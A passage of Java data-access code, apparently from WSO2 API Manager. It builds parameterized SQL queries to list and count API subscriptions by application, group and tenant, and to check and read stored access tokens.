String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? 
))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) ))"; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIdArr[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, applicationName); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubscriptionId(result.getInt("SUBS_ID")); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setUUID(result.getString("SUB_UUID")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); application.setUUID(result.getString("APP_UUID")); subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } /** * This method returns the set of APIs for given subscriber, subscribed under the specified application. * * @param subscriber subscriber * @param applicationId Application Id * @return Set<API> * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get SubscribedAPIs */ public Set<SubscribedAPI> getSubscribedAPIsByApplicationId(Subscriber subscriber, int applicationId, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_BY_ID_SQL; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? 
OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) ))"; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIdArr[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setInt(2, applicationId); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubscriptionId(result.getInt("SUBS_ID")); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setUUID(result.getString("SUB_UUID")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); application.setId(result.getInt("APP_ID")); application.setOwner(result.getString("OWNER")); application.setCallbackUrl(result.getString("CALLBACK_URL")); application.setUUID(result.getString("APP_UUID")); if (multiGroupAppSharingEnabled) { application.setGroupId(getGroupId(application.getId())); } int subscriptionId = result.getInt("SUBS_ID"); Set<APIKey> apiKeys = getAPIKeysBySubscription(subscriptionId); for (APIKey key : apiKeys) { subscribedAPI.addKey(key); } subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); } } catch (SQLException e) { 
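            // Any SQLException from the queries above is reported through handleException below;
            // the prepared statement, connection and result set are released in the finally block.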
handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } private Set<APIKey> getAPIKeysBySubscription(int subscriptionId) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String getKeysSql = SQLConstants.GET_API_KEY_BY_SUBSCRIPTION_SQL; Set<APIKey> apiKeys = new HashSet<APIKey>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getKeysSql); ps.setInt(1, subscriptionId); result = ps.executeQuery(); while (result.next()) { APIKey apiKey = new APIKey(); String decryptedAccessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); apiKey.setAccessToken(decryptedAccessToken); apiKey.setType(result.getString("TOKEN_TYPE")); apiKeys.add(apiKey); } } catch (SQLException e) { handleException("Failed to get API keys for subscription: " + subscriptionId, e); } catch (CryptoException e) { handleException("Failed to get API keys for subscription: " + subscriptionId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKeys; } public Integer getSubscriptionCount(Subscriber subscriber, String applicationName, String groupingId) throws APIManagementException { Integer subscriptionCount = 0; Connection connection = null; PreparedStatement ps = null; ResultSet result = null; int tenantId = APIUtil.getTenantId(subscriber.getName()); try { connection = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_CASE_INSENSITIVE_SQL; } String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR " + "((APP.GROUP_ID = '' OR APP.GROUP_ID IS NULL) AND SUB.USER_ID = ?)) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithUserId = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) 
"; String appIdentifier; boolean hasGrouping = false; if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); sqlQuery += whereClauseWithMultiGroupId; String[] groupIdArr = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); ps.setString(1, applicationName); ps.setInt(2, tenantId); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { sqlQuery += whereClauseWithGroupId; ps = connection.prepareStatement(sqlQuery); ps.setString(1, applicationName); ps.setInt(2, tenantId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClauseWithUserId; } ps = connection.prepareStatement(sqlQuery); ps.setString(1, applicationName); ps.setInt(2, tenantId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { subscriptionCount = result.getInt("SUB_COUNT"); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptionCount; } public Integer getSubscriptionCountByApplicationId(Subscriber subscriber, int applicationId, String groupingId) throws APIManagementException { Integer subscriptionCount = 0; Connection connection = null; PreparedStatement ps = null; ResultSet result = null; int tenantId = APIUtil.getTenantId(subscriber.getName()); try { connection = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_BY_APP_ID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_BY_APP_ID_CASE_INSENSITIVE_SQL; } String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR " + "((APP.GROUP_ID = '' OR APP.GROUP_ID IS NULL) AND SUB.USER_ID = ?)) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithUserId = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) 
"; String appIdentifier; boolean hasGrouping = false; if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); sqlQuery += whereClauseWithMultiGroupId; String[] groupIdArr = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); ps.setInt(1, applicationId); ps.setInt(2, tenantId); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { sqlQuery += whereClauseWithGroupId; ps = connection.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setInt(2, tenantId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClauseWithUserId; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setInt(2, tenantId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { subscriptionCount = result.getInt("SUB_COUNT"); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptionCount; } /** * Gets the subscribed API's, by the group for the application. * * @param subscriber the subscriber subscribing for the api * @param applicationName the application to which the api's are subscribed * @param startSubIndex the start index for pagination * @param endSubIndex end index for pagination * @param groupingId the group id of the application * @return the set of subscribed API's. * @throws APIManagementException */ public Set<SubscribedAPI> getPaginatedSubscribedAPIs(Subscriber subscriber, String applicationName, int startSubIndex, int endSubIndex, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_PAGINATED_SUBSCRIBED_APIS_SQL; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseForceCaseInsensitiveComp = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) 
))"; try { connection = APIMgtDBUtil.getConnection(); int tenantId = APIUtil.getTenantId(subscriber.getName()); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String groupIDArray[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIDArray, 3); ps.setInt(1, tenantId); ps.setString(2, applicationName); // dynamically seeting the parameter index int paramIndex = groupIDArray.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseForceCaseInsensitiveComp; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); int index = 0; while (result.next()) { if (index >= startSubIndex && index < endSubIndex) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); if (index == endSubIndex - 1) { break; } } index++; } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } /** * Gets the subscribed API's, by the group for the application. * * @param subscriber the subscriber subscribing for the api * @param applicationId the application to which the api's are subscribed * @param startSubIndex the start index for pagination * @param endSubIndex end index for pagination * @param groupingId the group id of the application * @return the set of subscribed API's. * @throws APIManagementException */ public Set<SubscribedAPI> getPaginatedSubscribedAPIs(Subscriber subscriber, int applicationId, int startSubIndex, int endSubIndex, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_PAGINATED_SUBSCRIBED_APIS_BY_APP_ID_SQL; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseForceCaseInsensitiveComp = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? 
OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) ))"; try { connection = APIMgtDBUtil.getConnection(); int tenantId = APIUtil.getTenantId(subscriber.getName()); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String groupIDArray[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIDArray, 3); ps.setInt(1, tenantId); ps.setInt(2, applicationId); // dynamically seeting the parameter index int paramIndex = groupIDArray.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseForceCaseInsensitiveComp; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); int index = 0; while (result.next()) { if (index >= startSubIndex && index < endSubIndex) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); if (index == endSubIndex - 1) { break; } } index++; } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } /** * This method returns the set of APIs for given subscriber * * @param subscriber subscriber * @return Set<API> * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get SubscribedAPIs */ public Set<SubscribedAPI> getSubscribedAPIs(Subscriber subscriber, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = 
null; //identify subscribeduser used email/ordinalusername String subscribedUserName = getLoginUserName(subscriber.getName()); subscriber.setName(subscribedUserName); String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_SUBSCRIBER_SQL; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseInSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ? " + "OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitiveComp = " AND ( (APP.APPLICATION_ID IN (SELECT " + "APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER(?) ))"; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitiveComp; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] groupIdArr = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 2); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); int paramIndex = groupIdArr.length + 1; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, groupingId); ps.setString(3, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseInSensitive; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, subscriber.getName()); } result = ps.executeQuery(); Map<String, Set<SubscribedAPI>> map = new TreeMap<String, Set<SubscribedAPI>>(); LRUCache<Integer, Application> applicationCache = new LRUCache<Integer, Application>(100); while (result.next()) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubscriptionId(result.getInt("SUBS_ID")); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); String tierName = result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID); subscribedAPI.setTier(new Tier(tierName)); subscribedAPI.setUUID(result.getString("SUB_UUID")); //setting NULL for subscriber. 
If needed, Subscriber object should be constructed & // passed in int applicationId = result.getInt("APP_ID"); Application application = applicationCache.get(applicationId); if (application == null) { application = new Application(result.getString("APP_NAME"), subscriber); application.setId(result.getInt("APP_ID")); application.setTokenType(result.getString("APP_TOKEN_TYPE")); application.setCallbackUrl(result.getString("CALLBACK_URL")); application.setUUID(result.getString("APP_UUID")); if (multiGroupAppSharingEnabled) { application.setGroupId(getGroupId(application.getId())); application.setOwner(result.getString("OWNER")); } applicationCache.put(applicationId, application); } subscribedAPI.setApplication(application); if (!map.containsKey(application.getName())) { map.put(application.getName(), new TreeSet<>(new Comparator<SubscribedAPI>() { public int compare(SubscribedAPI o1, SubscribedAPI o2) { int placement = o1.getApiId().getApiName().compareTo(o2.getApiId().getApiName()); if (placement == 0) { return new APIVersionComparator().compare(new API(o1.getApiId()), new API(o2.getApiId ())); } return placement; } })); } map.get(application.getName()).add(subscribedAPI); } for (Map.Entry<String, Set<SubscribedAPI>> entry : map.entrySet()) { subscribedAPIs.addAll(entry.getValue()); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } public boolean isAccessTokenExists(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); String getTokenSql = SQLConstants.IS_ACCESS_TOKEN_EXISTS_PREFIX + accessTokenStoreTable + SQLConstants.IS_ACCESS_TOKEN_EXISTS_SUFFIX; boolean tokenExists = false; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); String encryptedAccessToken = APIUtil.encryptToken(accessToken); ps.setString(1, encryptedAccessToken); result = ps.executeQuery(); while (result.next()) { tokenExists = true; } } catch (SQLException e) { handleException("Failed to check availability of the access token. ", e); } catch (CryptoException e) { handleException("Failed to check availability of the access token. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenExists; } public boolean isAccessTokenRevoked(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); String getTokenSql = SQLConstants.IS_ACCESS_TOKEN_REVOKED_PREFIX + accessTokenStoreTable + SQLConstants.IS_ACCESS_TOKE_REVOKED_SUFFIX; boolean tokenExists = false; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); String encryptedAccessToken = APIUtil.encryptToken(accessToken); ps.setString(1, encryptedAccessToken); result = ps.executeQuery(); while (result.next()) { if (!"REVOKED".equals(result.getString("TOKEN_STATE"))) { tokenExists = true; } } } catch (SQLException e) { handleException("Failed to check availability of the access token. 
", e); } catch (CryptoException e) { handleException("Failed to check availability of the access token. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenExists; } public APIKey getAccessTokenData(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; APIKey apiKey = new APIKey(); String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); String getTokenSql = SQLConstants.GET_ACCESS_TOKEN_DATA_PREFIX + accessTokenStoreTable + SQLConstants .GET_ACCESS_TOKEN_DATA_SUFFIX; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); ps.setString(1, APIUtil.encryptToken(accessToken)); result = ps.executeQuery(); if (result.next()) { String decryptedAccessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); // todo - check String endUserName = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_AUTHORIZED_USER); String domainName = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String endUsernameWithDomain = UserCoreUtil.addDomainToName(endUserName, domainName); apiKey.setAuthUser(endUsernameWithDomain); apiKey.setAccessToken(decryptedAccessToken); apiKey.setCreatedDate(result.getTimestamp("TIME_CREATED").toString().split("\\.")[0]); String consumerKey = result.getString("CONSUMER_KEY"); apiKey.setConsumerKey(consumerKey); apiKey.setValidityPeriod(result.getLong("VALIDITY_PERIOD")); List<String> scopes = new ArrayList<String>(); do { scopes.add(result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } while (result.next()); apiKey.setTokenScope(getScopeString(scopes)); } } catch (SQLException e) { handleException("Failed to get the access token data. ", e); } catch (CryptoException e) { handleException("Failed to get the access token data. 
